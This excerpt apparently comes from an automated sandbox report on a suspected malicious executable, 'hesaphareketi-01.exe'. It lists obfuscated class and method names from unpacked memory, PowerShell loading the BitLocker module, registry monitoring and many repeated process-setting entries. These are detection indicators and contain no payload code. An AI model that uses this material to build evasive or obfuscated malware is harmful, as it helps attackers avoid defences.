Source: 0.2.hesaphareketi-01.exe.72b0000.5.raw.unpack, wQsyN3jrFRx4eqkJswY.cs	High entropy of concatenated method names: 'dVEGU9PYsh', 'PaiGl6fJxS', 'wLrG5tNGOb', 'bFUGSEOkjW', 's86G1TpNSv', 'vniGeO9cEG', 'uWwGT4riIR', 'kQbGa8lI2a', 'SOaG06bh62', 'G8dG9eNt80'
Source: 0.2.hesaphareketi-01.exe.72b0000.5.raw.unpack, Bqig4fBWlNnik6b5Es.cs	High entropy of concatenated method names: 'vFUihx7lg0', 'YUmiqTlJpQ', 'syLiKllxXG', 'Yu0i4RrVTh', 'qMMicxgP6L', 'DlBiIlaers', 'eugiAWlgCn', 'nUUin20XSY', 'QYDiVZNYub', 'FMRimmiCOD'
Source: 0.2.hesaphareketi-01.exe.72b0000.5.raw.unpack, nKaYZGLEjFqgbEAG6K.cs	High entropy of concatenated method names: 'eHVGjXxZwP', 'UJbGF0rLN9', 'WLwGN7AhHP', 'FT1Gh1H0ar', 'ppNGqQ4k9p', 'TZ9G4JIyrJ', 'nIdGclT3BE', 'GQniwwmWSC', 'StgiBEYLEU', 'wa5iXAnYjL'
Source: 0.2.hesaphareketi-01.exe.72b0000.5.raw.unpack, BHfgTHERtp2uwV61pr.cs	High entropy of concatenated method names: 'dqNPa3fFjB', 'GMEP0laN53', 'YsDPJp68Uj', 'HvyPWQfjg8', 'Wd2Po3EFxG', 'T7ZPvuEW7u', 'LEFP3cytBw', 'HuEPHmGDLI', 'dDMPkDaRw0', 'aRRPb0F7Jr'
Source: 0.2.hesaphareketi-01.exe.72b0000.5.raw.unpack, ekPH56jFBHPcSRygsU9.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'rGDRuGOgyt', 'JY1RdLCuGy', 'fwcRZCu45K', 'dSURC4IZcS', 'Ja8RgcARLX', 'mRcRMGsxnn', 'QcBRwQEtHB'
Source: 0.2.hesaphareketi-01.exe.72b0000.5.raw.unpack, BsutTpQm8aKu0PAwGq.cs	High entropy of concatenated method names: 'FcoIUHJ9pU', 'NT0Il8M77o', 'KR3I5Z5p4V', 'NBcIScu5Zs', 'aM1I1uCmVn', 'B2nIeg0AfX', 'Im6ITPi7J5', 'axvIaTLJBy', 'BkvI0ESD2d', 'Tc3I9fdhtC'
Source: 0.2.hesaphareketi-01.exe.72b0000.5.raw.unpack, w6oIrjjjrH6HSVsxJou.cs	High entropy of concatenated method names: 'ToString', 'bfWRFMR5hL', 'KGWRNnKnny', 'su8R2vr7Ar', 'UlCRhOvXhn', 'vgTRqDXl85', 'uQYRKUClcD', 'OH7R4jWkUl', 'prlEfOCG1InbX77IVTr', 'zvMFdxCzALKODgRGjEG'
Source: 0.2.hesaphareketi-01.exe.72b0000.5.raw.unpack, NyvrOwANqHHPpEqfI2.cs	High entropy of concatenated method names: 'CHkF2C8msq', 'CxYFhsTGxb', 'qvKFq9INku', 'bijFKUlgFN', 'krGF4HNJyx', 'fOJFcRtSJA', 'DKbFIhtXVw', 'bbYFAkLh7H', 'GotFnP628d', 'jgMFVpA01I'
Source: 0.2.hesaphareketi-01.exe.72b0000.5.raw.unpack, x42tUDawqVMVIAc1ru.cs	High entropy of concatenated method names: 'dyqquaE5xO', 'H2FqdtNPxY', 'xITqZQGgEq', 'mgFqCr1Tei', 'MyKqgDy1Tm', 'JHdqM3uCdc', 'Y9IqwFXjYv', 'UPpqBQQhAD', 'SUSqX6EGK8', 'zXCqLJPBWM'
Source: 0.2.hesaphareketi-01.exe.72b0000.5.raw.unpack, KMtGXDZWdhSH9pvSxH.cs	High entropy of concatenated method names: 'ToString', 'PW5YbughMM', 'EHeYWpOOkf', 'a6XYsCJW1L', 'zmiYoXiHcC', 'aY9YvLTMpT', 'FKAYOQB2Tf', 'WsQY30qtlE', 'CmwYH5c7VH', 'djVYQZh3Ft'
Source: 0.2.hesaphareketi-01.exe.72b0000.5.raw.unpack, BTpc3J7D3SBEyv9U7p.cs	High entropy of concatenated method names: 'rgq57vCpc', 'w31SVODfF', 'nVZebC1u8', 'y6QTF9PCV', 'YaL0DBsNM', 'ChD9UOvfo', 'SvUYG5pthpvtDTvu5H', 'iSdfnkj98oWKop00Bf', 'VXFiQJe71', 'JavRgyQTJ'
Source: 0.2.hesaphareketi-01.exe.72b0000.5.raw.unpack, KdjFA7JcmgyHHD8gwD.cs	High entropy of concatenated method names: 'Y0Uc24u9su', 'LivcqLdDBo', 's1fc4ow9NB', 'P9fcIYusyv', 'KYqcA90dZy', 'DvC4g0KK79', 'vQm4MeWeL1', 'GIw4wOOMim', 'WqV4BCjLds', 'V8L4X7El8L'
Source: 0.2.hesaphareketi-01.exe.72b0000.5.raw.unpack, Peg55JMlLh2fxtSMAh.cs	High entropy of concatenated method names: 'ppTDBeME1g', 'jR8DLMWwkJ', 'LsKirsFEDH', 'nKbij87e9J', 's4VDbR6oNP', 'c7bDy1VUFL', 'zFSDEK3SF0', 'CieDudkYTQ', 'xR6DdWSI0k', 'heADZHDjxu'
Source: 0.2.hesaphareketi-01.exe.499cb90.1.raw.unpack, W4YSgpXx1TLZ2wuZI4.cs	High entropy of concatenated method names: 'ON4iJAfUus', 'wWeiWqINS4', 'qmeis8cequ', 'loTio5Df3r', 'L6giuChufQ', 'BGGivMsR00', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.hesaphareketi-01.exe.499cb90.1.raw.unpack, Lru2IQueJDeFM6MNgS.cs	High entropy of concatenated method names: 'wyIxkdZBbf', 's5OxyWk0hN', 'k76xuZJI9R', 'zFZxdg53H6', 'yOIxWsP3sE', 'ThUxs9EcgP', 'i6mxoor4Hb', 'ULHxvOEwwV', 'qVnxOaj5ob', 'lNGx3BBUUD'
Source: 0.2.hesaphareketi-01.exe.499cb90.1.raw.unpack, AWEkJ5qunuLJQqAYM9.cs	High entropy of concatenated method names: 'Dispose', 'wAljXeLvR2', 'bVd7WKja8L', 'Ek5lljZyiP', 'JeqjLig4fW', 'yNnjzik6b5', 'ProcessDialogKey', 'Qsw7r4YSgp', 'o1T7jLZ2wu', 'SI477mKaYZ'
Source: 0.2.hesaphareketi-01.exe.499cb90.1.raw.unpack, BDUJmYCmvtMfBTT66g.cs	High entropy of concatenated method names: 'PfeDVlXivY', 'fh3DmheNpD', 'ToString', 'OnFDhQohdP', 'CKkDqrR9bH', 'YXPDKNlH02', 'i87D4ZUMJd', 'aF9Dce6yOj', 'ufCDIfcjLb', 'qvFDAQuNgC'
Source: 0.2.hesaphareketi-01.exe.499cb90.1.raw.unpack, B25QqgNEisqhgpsLwd.cs	High entropy of concatenated method names: 'UpUjI42tUD', 'WqVjAMVIAc', 'Ja3jV5rUqQ', 'wsSjmY4BSx', 'N53jx7eOdj', 'cA7jYcmgyH', 'yUJX9DSG3oxAsYdHXo', 'csoVAoJNHJNK7VWNNl', 'XOGjjRPB8Z', 'gCGjF24PXf'
Source: 0.2.hesaphareketi-01.exe.499cb90.1.raw.unpack, mWRLGq3HKbKsiVEl4x.cs	High entropy of concatenated method names: 'haAIh1qHPM', 'jxeIKM6Pux', 'MLQIcbAJ7i', 'KONcLfJyPv', 'fMNcztQn7w', 'RKFIrru9Mf', 'cPYIjPdXr6', 't3cI7P5ifp', 'SwNIFGtY7Z', 'kQGINgSFRu'
Source: 0.2.hesaphareketi-01.exe.499cb90.1.raw.unpack, bVfaPLzIGqxh2txVLx.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'JbmGPLLQ98', 'SyNGxInUaU', 'NKGGYFdx4t', 'o9GGD8MHob', 'Y56Gif2pZ9', 'loiGGfYf7B', 'TBQGR7SB0a'
Source: 0.2.hesaphareketi-01.exe.499cb90.1.raw.unpack, LATEJv0a35rUqQfsSY.cs	High entropy of concatenated method names: 'HgWKSU01ds', 'iZ6KeevvP8', 'LBsKaUKB1g', 'LRUK0TxARd', 'bisKx4H4AV', 'R4lKY7n8cR', 'XaXKDoh55l', 'vlrKi5mZ3S', 'w20KGVu1Ly', 'EOFKRwuCw3'
Source: 0.2.hesaphareketi-01.exe.499cb90.1.raw.unpack, iBSxP497a3eAak537e.cs	High entropy of concatenated method names: 'Se141VLmW3', 'SSr4Tak5Vd', 'IRQKsjRKGV', 'foPKodsG0r', 'QS2KvJKLNG', 'GKoKOjuGmO', 'xiyK30s4Nj', 'tWOKHQlLEm', 'mVxKQA4KIZ', 'QabKkmV3xo'
Source: 0.2.hesaphareketi-01.exe.499cb90.1.raw.unpack, wQsyN3jrFRx4eqkJswY.cs	High entropy of concatenated method names: 'dVEGU9PYsh', 'PaiGl6fJxS', 'wLrG5tNGOb', 'bFUGSEOkjW', 's86G1TpNSv', 'vniGeO9cEG', 'uWwGT4riIR', 'kQbGa8lI2a', 'SOaG06bh62', 'G8dG9eNt80'
Source: 0.2.hesaphareketi-01.exe.499cb90.1.raw.unpack, Bqig4fBWlNnik6b5Es.cs	High entropy of concatenated method names: 'vFUihx7lg0', 'YUmiqTlJpQ', 'syLiKllxXG', 'Yu0i4RrVTh', 'qMMicxgP6L', 'DlBiIlaers', 'eugiAWlgCn', 'nUUin20XSY', 'QYDiVZNYub', 'FMRimmiCOD'
Source: 0.2.hesaphareketi-01.exe.499cb90.1.raw.unpack, nKaYZGLEjFqgbEAG6K.cs	High entropy of concatenated method names: 'eHVGjXxZwP', 'UJbGF0rLN9', 'WLwGN7AhHP', 'FT1Gh1H0ar', 'ppNGqQ4k9p', 'TZ9G4JIyrJ', 'nIdGclT3BE', 'GQniwwmWSC', 'StgiBEYLEU', 'wa5iXAnYjL'
Source: 0.2.hesaphareketi-01.exe.499cb90.1.raw.unpack, BHfgTHERtp2uwV61pr.cs	High entropy of concatenated method names: 'dqNPa3fFjB', 'GMEP0laN53', 'YsDPJp68Uj', 'HvyPWQfjg8', 'Wd2Po3EFxG', 'T7ZPvuEW7u', 'LEFP3cytBw', 'HuEPHmGDLI', 'dDMPkDaRw0', 'aRRPb0F7Jr'
Source: 0.2.hesaphareketi-01.exe.499cb90.1.raw.unpack, ekPH56jFBHPcSRygsU9.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'rGDRuGOgyt', 'JY1RdLCuGy', 'fwcRZCu45K', 'dSURC4IZcS', 'Ja8RgcARLX', 'mRcRMGsxnn', 'QcBRwQEtHB'
Source: 0.2.hesaphareketi-01.exe.499cb90.1.raw.unpack, BsutTpQm8aKu0PAwGq.cs	High entropy of concatenated method names: 'FcoIUHJ9pU', 'NT0Il8M77o', 'KR3I5Z5p4V', 'NBcIScu5Zs', 'aM1I1uCmVn', 'B2nIeg0AfX', 'Im6ITPi7J5', 'axvIaTLJBy', 'BkvI0ESD2d', 'Tc3I9fdhtC'
Source: 0.2.hesaphareketi-01.exe.499cb90.1.raw.unpack, w6oIrjjjrH6HSVsxJou.cs	High entropy of concatenated method names: 'ToString', 'bfWRFMR5hL', 'KGWRNnKnny', 'su8R2vr7Ar', 'UlCRhOvXhn', 'vgTRqDXl85', 'uQYRKUClcD', 'OH7R4jWkUl', 'prlEfOCG1InbX77IVTr', 'zvMFdxCzALKODgRGjEG'
Source: 0.2.hesaphareketi-01.exe.499cb90.1.raw.unpack, NyvrOwANqHHPpEqfI2.cs	High entropy of concatenated method names: 'CHkF2C8msq', 'CxYFhsTGxb', 'qvKFq9INku', 'bijFKUlgFN', 'krGF4HNJyx', 'fOJFcRtSJA', 'DKbFIhtXVw', 'bbYFAkLh7H', 'GotFnP628d', 'jgMFVpA01I'
Source: 0.2.hesaphareketi-01.exe.499cb90.1.raw.unpack, x42tUDawqVMVIAc1ru.cs	High entropy of concatenated method names: 'dyqquaE5xO', 'H2FqdtNPxY', 'xITqZQGgEq', 'mgFqCr1Tei', 'MyKqgDy1Tm', 'JHdqM3uCdc', 'Y9IqwFXjYv', 'UPpqBQQhAD', 'SUSqX6EGK8', 'zXCqLJPBWM'
Source: 0.2.hesaphareketi-01.exe.499cb90.1.raw.unpack, KMtGXDZWdhSH9pvSxH.cs	High entropy of concatenated method names: 'ToString', 'PW5YbughMM', 'EHeYWpOOkf', 'a6XYsCJW1L', 'zmiYoXiHcC', 'aY9YvLTMpT', 'FKAYOQB2Tf', 'WsQY30qtlE', 'CmwYH5c7VH', 'djVYQZh3Ft'
Source: 0.2.hesaphareketi-01.exe.499cb90.1.raw.unpack, BTpc3J7D3SBEyv9U7p.cs	High entropy of concatenated method names: 'rgq57vCpc', 'w31SVODfF', 'nVZebC1u8', 'y6QTF9PCV', 'YaL0DBsNM', 'ChD9UOvfo', 'SvUYG5pthpvtDTvu5H', 'iSdfnkj98oWKop00Bf', 'VXFiQJe71', 'JavRgyQTJ'
Source: 0.2.hesaphareketi-01.exe.499cb90.1.raw.unpack, KdjFA7JcmgyHHD8gwD.cs	High entropy of concatenated method names: 'Y0Uc24u9su', 'LivcqLdDBo', 's1fc4ow9NB', 'P9fcIYusyv', 'KYqcA90dZy', 'DvC4g0KK79', 'vQm4MeWeL1', 'GIw4wOOMim', 'WqV4BCjLds', 'V8L4X7El8L'
Source: 0.2.hesaphareketi-01.exe.499cb90.1.raw.unpack, Peg55JMlLh2fxtSMAh.cs	High entropy of concatenated method names: 'ppTDBeME1g', 'jR8DLMWwkJ', 'LsKirsFEDH', 'nKbij87e9J', 's4VDbR6oNP', 'c7bDy1VUFL', 'zFSDEK3SF0', 'CieDudkYTQ', 'xR6DdWSI0k', 'heADZHDjxu'

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
